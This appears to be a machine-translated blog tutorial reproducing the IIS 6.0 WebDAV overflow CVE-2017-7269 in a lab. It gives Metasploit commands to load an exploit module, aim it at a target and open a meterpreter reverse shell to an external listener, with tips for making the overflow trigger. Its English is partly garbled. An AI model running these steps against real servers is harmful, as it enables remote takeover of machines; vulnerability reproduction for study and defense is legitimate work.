IIS6 remote code execution vulnerability reproduction CVE-2017-7269

Others 2019-11-16 23:37:03 views: null

Brief

CVE-2017-7269 IIS 6.0 is present in a stack overflow, in IIS6.0 PROPFIND command process, because of the length of the url is not effective length control and inspection, resulting in memcpy performed when the virtual path configuration , causing a stack overflow vulnerability that could lead to remote code execution.

test environment

  • Compromised system: windows server 2003
  • Attack system: Kali 2018.04
  • Rebound Host: Ubuntu 18.04 LTS

CVE-2017-7269 vulnerability principle

PROPFIND request caused by the malicious: If when the field contains http: // localhost / xxxx when this long URL, buffer overflow (heap and stack overflow including overflow)

Specific location w3wp.exe, the function module at httpext ScStoragePathFromUrl.

  • httpext! ScStoragePathFromUrl + at 0x360 generated when copying memory heap overflow
  • Spilled in stacks at 0x0000013c distribution httpext HrCheckIfHeader +!;
  • ! Crash location is executed from a function httpext HrCheckIfHeader over;

Metasploit5 use EXP

Metasploit load custom module

The method of loading custom module

1、  在home目录里的【$HOME/.msf4/modules/exploits/】里就是自定义的模块
2、  复制自定义模块到这个目录里调用,使用msf的reload_all就可以重新加载模块路径

Load EXP online

# 创建EXP的路径
mkdir -p $HOME/.msf4/modules/exploits/test
# 示例模块加载
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb


# 加载在线模块
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808

Local loaded EXP

mkdir -p $HOME/.msf4/modules/exploits/test
cp cve-2017-7269.rb ~/.msf4/modules/exploits/test/test_module.rb

Metasploit using the command - CVE-2017-7269

# 示例用法
reload_all                        # 加载自定义模块
use exploit/test/test_module.rb   # 使用刚才加载模块的路径
show optins                       # 显示当前配置的选项
set RHOST <远程攻击IP>            # 远程攻击IP
set HttpHost <网站域名>           # 远程网站
set PhysicalPathLength <长度>     # 设置网站物理路径长度
set payload windows/meterpreter/reverse_tcp # 设置payload
set LHOST <监听IP>                # 监听IP
exploit                           # 漏洞测试 

# 使用
reload_all
use exploit/test/test_module.rb
show options
set RHOST 192.168.221.147
set HttpHost 192.168.221.147
set PhysicalPathLength 8
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.221.133
exploit

Metasploit rebound SHELL

The actual process will rebound to the VPS external network, install Metasploit on Ubuntu VPS.

# 下载和安装metasploit
Curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# 示例说明
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit

# 使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 103.85.24.14
set LPORT 4444
exploit

The Metasploit of meterpreter running in the background with the current shell [background] command. Then call up with the [sessions] on it.

Windows server 2003 real issue

  • Question 1: The length of the path of the local site needs to fill properly, or not to trigger a buffer overflow vulnerability. FIG path length of for example 8:

  • Question 2: If the header information of two url is required and the site is bound to match, will fail if the POC is inconsistent head inside the domain and port binding.
  • Question 3: IIS binding domain of the need to write
  • Question 4: the case of multiple sites with the next application pool, and sometimes execution exp for one site, will lead to the same application pool all of the following sites all returns 500, this situation can be found next to the station because each pool is independent w3wp process, for a possible attempt at the other pool.

Reference article

[1] msf module described
https://www.offensive-security.com/metasploit-unleashed/modules-and-locations/
[2] MSF instructions
https://github.com/rapid7/metasploit-framework/wiki
[ . 3] CVE-2017-7269
https://github.com/zcgonvh/cve-2017-7269
[. 4] IIS6.0 remote code execution vulnerability reproduction (CVE-2017-7269)
https://blog.csdn.net / darkhq / Article This article was / Details / 79.12782 million
[. 5] open the right CVE-2017-7269 IIS6_WebDAV remote code execution
https://anquan.baidu.com/article/391
[. 6] https://www.ivoidwarranties.tech/ Posts / pentesting-tuts / Metasploit / Simple-Attack /
[. 7] https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
[. 8] several techniques CVE-2017-7269 and BUG correction
https://www.secpulse.com/archives/57264.html

Guess you like

Origin www.cnblogs.com/17bdw/p/11874484.html
Recommended
Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?
Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running
Ranking
8个无需编写代码即可使用 Python 内置库的方法
Java collections interview knowledge Lite
Machine learning algorithms foundation - Introduction a (watermelon materials for the book)
(Easy) Ransom Note - LeetCode
[Five days] Qt from entry to actual combat: the second day
Remember once extremely pit father can not download Maven Jar package of issues: IDEA question
The minimum cost Shortest
OSPF study map (the most complete version)
Network Takeaways
GnuPG
Daily
More
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

Code World

© 2018 codetd.com